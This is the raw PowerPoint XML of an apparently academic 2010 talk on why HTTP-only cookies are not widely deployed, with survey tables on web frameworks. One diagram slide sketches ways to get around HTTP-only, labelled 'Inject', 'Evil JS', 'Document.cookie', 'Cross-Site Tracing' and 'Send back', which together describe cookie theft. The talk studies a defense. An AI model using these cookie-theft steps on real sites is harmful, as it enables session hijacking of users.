                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="668867"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1.1.1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July</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 2009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lnTlToB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</a:tr>
              <a:tr h="334434">
                <a:tc rowSpan="2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Authkit 0.4.4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July 2009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lnTlToB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</a:tr>
              <a:tr h="33443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Repoze.who 1.0.10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2009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lnTlToB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</a:tr>
              <a:tr h="222956">
                <a:tc rowSpan="3"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2.3.2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Mar 2009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Yes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Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="22295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2.2.2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Nov 2008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Yes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No</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="22295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2.1.2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Oct 2008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lnTlToB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</a:tr>
              <a:tr h="668867"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4.0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Feb 2010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Yes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Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="668867"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Feb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 2010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Yes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No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="668867"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3.0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Feb 2010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No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Survey Results on Web Frameworks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="2133600"/>
            <a:ext cx="1333500" cy="4292600"/>
            <a:chOff x="914400" y="2133600"/>
            <a:chExt cx="1333500" cy="4292600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4400" y="2895600"/>
              <a:ext cx="1328737" cy="379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90600" y="2133600"/>
              <a:ext cx="1257300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71600" y="3733800"/>
              <a:ext cx="4608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14400" y="4724400"/>
              <a:ext cx="1295400" cy="403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914400" y="5410200"/>
              <a:ext cx="127635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990600" y="6019800"/>
              <a:ext cx="1219200" cy="40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advTm="2457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Why Aren’t HTTP-only Cookies More Widely Deployed?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advTm="951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dirty="0" smtClean="0"/>
              <a:t>Does DOM need to read cookies?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 lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Only 1 site out of 50 showed a minor malfunction on their web IM gadget. (renren.com)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066800" y="3962400"/>
            <a:ext cx="6781800" cy="1675379"/>
            <a:chOff x="838200" y="3048000"/>
            <a:chExt cx="7324725" cy="1876425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38200" y="4267200"/>
              <a:ext cx="7296150" cy="657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38200" y="3048000"/>
              <a:ext cx="7324725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Page Functionality</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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2149098"/>
            <a:ext cx="533400" cy="55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矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="2667000"/>
            <a:ext cx="113896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Httponly;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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114800" y="2057400"/>
            <a:ext cx="1524000" cy="9906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20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="2776268"/>
            <a:ext cx="6847609" cy="957532"/>
            <a:chOff x="838200" y="2776268"/>
            <a:chExt cx="6847609" cy="957532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="组合 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="838200" y="2776268"/>
              <a:ext cx="6172200" cy="957532"/>
              <a:chOff x="838200" y="2743200"/>
              <a:chExt cx="6172200" cy="957532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838200" y="2743200"/>
                <a:ext cx="1409700" cy="9575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" name="左右箭头 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2362200" y="3211889"/>
                <a:ext cx="2133600" cy="228600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" name="组合 12"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4648200" y="3048000"/>
                <a:ext cx="609600" cy="609600"/>
                <a:chOff x="1295400" y="3429000"/>
                <a:chExt cx="838200" cy="838200"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Picture 2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1295400" y="3429000"/>
                  <a:ext cx="719137" cy="6903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5" name="加号 14"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1676400" y="3810000"/>
                  <a:ext cx="457200" cy="457200"/>
                </a:xfrm>
                <a:prstGeom prst="mathPlus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6" name="右箭头 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5334000" y="3186192"/>
                <a:ext cx="1676400" cy="2286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62800" y="3124200"/>
              <a:ext cx="523009" cy="502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custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0" advTm="565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24167 3.33333E-6 " pathEditMode="relative" ptsTypes="AA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167 -3.7037E-6 L 0.52917 0.0018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8334 0 " pathEditMode="relative" ptsTypes="AA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2875 0.00186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 animBg="1"/>
      <p:bldP spid="1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Can We Circumvent HTTP-only?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="左箭头 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="4888468"/>
            <a:ext cx="2133600" cy="381000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Send back</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="右箭头 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2690998">
            <a:off x="4895716" y="3401259"/>
            <a:ext cx="2887769" cy="3810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Document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7239000" cy="3815606"/>
            <a:chOff x="1600200" y="2362200"/>
            <a:chExt cx="7239000" cy="3815606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0200" y="2362200"/>
              <a:ext cx="1409700" cy="957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86400" y="2590800"/>
              <a:ext cx="719137" cy="690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左右箭头 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124200" y="2830889"/>
              <a:ext cx="2133600" cy="2286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153400" y="5486400"/>
              <a:ext cx="685800" cy="69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4648200"/>
            <a:ext cx="1243012" cy="979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矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19037353">
            <a:off x="5357886" y="3216221"/>
            <a:ext cx="15752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HTTPONLY</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5" name="曲线连接符 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5291137" y="2173986"/>
            <a:ext cx="2290763" cy="2550414"/>
          </a:xfrm>
          <a:prstGeom prst="curved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乘号 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18837487">
            <a:off x="6145981" y="3478982"/>
            <a:ext cx="609600" cy="6096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5638800" y="533400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Inject</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="2590800"/>
            <a:ext cx="4953000" cy="2133600"/>
            <a:chOff x="2209800" y="2590800"/>
            <a:chExt cx="4953000" cy="2133600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="直接箭头连接符 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2209800" y="2590800"/>
              <a:ext cx="4953000" cy="21336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 rot="1370405">
              <a:off x="3885708" y="3314612"/>
              <a:ext cx="18409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Cross-Site Tracing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1375346">
              <a:off x="3732683" y="3698477"/>
              <a:ext cx="1849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XMLHTTPRequest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4" name="直接箭头连接符 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1828800"/>
            <a:ext cx="2645569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620000" y="4343400"/>
            <a:ext cx="1162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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cookie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391400" y="5105400"/>
            <a:ext cx="10666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Evil JS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直接箭头连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="5334000"/>
            <a:ext cx="21336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曲线连接符 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="0"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4808934" y="1951435"/>
            <a:ext cx="2895600" cy="2650331"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7895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09800" y="1295400"/>
            <a:ext cx="386720" cy="40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58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7.77778E-6 C 0.21301 0.01019 0.42603 0.02061 0.52031 0.08542 C 0.61458 0.15024 0.56458 0.33866 0.56562 0.38959 " pathEditMode="relative" ptsTypes="aaA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562 0.38958 L 0.26215 0.44861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14" grpId="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/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1|5.4|40.9|1.2|1.2|2.3|6|4.1|5.7|14.1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1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2.8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|0|32.8|3.9|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.8|2.3|5.2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8|34.3|13.9|10.1|0.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4289</TotalTime>
  <Words>880</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>283</Paragraphs>
  <Slides>21</Slides>
  <Notes>17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</vt:lpstr>
      <vt:lpstr>Why aren’t HTTP-only cookies more widely deployed?</vt:lpstr>
      <vt:lpstr>HTTP-only Cookies</vt:lpstr>
      <vt:lpstr>HTTP-only Deployment Timeline</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Survey Results</vt:lpstr>
      <vt:lpstr>Survey Results on Web Frameworks</vt:lpstr>
      <vt:lpstr>Why Aren’t HTTP-only Cookies More Widely Deployed?</vt:lpstr>
      <vt:lpstr>Page Functionality</vt:lpstr>
      <vt:lpstr>Can We Circumvent HTTP-only?</vt:lpstr>
      <vt:lpstr>Can We Circumvent HTTP-only?</vt:lpstr>
      <vt:lpstr>Protection Effectiveness</vt:lpstr>
      <vt:lpstr>Software Stack Compatibility</vt:lpstr>
      <vt:lpstr>Standards Compliance</vt:lpstr>
      <vt:lpstr>Difficulty in Deploying in Both Ends</vt:lpstr>
      <vt:lpstr>Difficulty in Deploying in Both Ends</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>幻灯片 17</vt:lpstr>
      <vt:lpstr>Backup Slides</vt:lpstr>
      <vt:lpstr>Survey Results</vt:lpstr>
      <vt:lpstr>Survey Results on More Sites</vt:lpstr>
      <vt:lpstr>Page Functionality</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>UVa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pinkforpeace</dc:creator>
  <cp:lastModifiedBy>pinkforpeace</cp:lastModifiedBy>
  <cp:revision>784</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-05-02T17:28:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-05-20T21:03:07Z</dcterms:modified>
</cp:coreProperties>
</file>